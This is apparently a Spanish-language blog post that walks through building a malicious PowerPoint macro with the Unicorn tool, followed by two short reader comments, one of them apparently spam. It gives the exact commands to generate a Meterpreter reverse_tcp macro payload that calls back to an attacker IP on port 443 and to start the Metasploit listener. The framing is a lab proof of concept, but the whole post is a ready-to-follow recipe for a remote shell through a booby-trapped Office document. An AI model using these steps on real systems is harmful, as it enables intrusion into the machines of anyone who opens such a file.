
Autor: Diego Jurado
Buenas a todos!!
En el día de hoy, os traigo una pequeña prueba de concepto (PoC), una técnica muy habitual y bien conocida en la cual crearemos un documento PowerPoint donde insertaremos una macro maliciosa que nos permitirá crear una sesión remota sobre el atacante que lo ejecute.
En primer lugar, para esta PoC utilizaré una máquina virtual Kali Linux 2016 (VMWare), y más adelante utilizaré una máquina Windows 7 para probar nuestro powerpoint malicioso.
Deberemos descargarnos la herramienta Unicorn.
Esta herramienta es un script escrito en Python y desarrollado por David Kennedy (Trustedsec) y que se basa en un downgrade en Powershell para inyectar un Shellcode en memoria.
Podemos descargar la herramienta aquí: https://github.com/trustedsec/unicorn
Ejecutaremos la herramienta con el siguiente comando:
- python unicorn.py

Ahora crearemos nuestra macro, utilizando una conexión reversa, donde pondré la IP de mi máquina Kali Linux (192.168.48.132), un puerto a utilizar (en este caso he usado el 443 pero podríamos usar cualquier otro):
- python unicorn.py windows/meterpreter/reverse_tcp 192.168.48.132 443 macro

- El código se encuentra en el fichero de salida powershell_attack.txt
- Para poner la conexión a la escucha ejecutaremos el comando msfconsole -r unicorn.rc



- msfconsole -r unicorn.rc


2 comentarios en «Atacando a través de Macro Maliciosa en PowerPoint – Unicorn PowerShell Attack»
MUCHAS GRACIAS!
I like this weblog so considerably, saved to my bookmarks. ebgfacekddbfadee
Los comentarios están cerrados.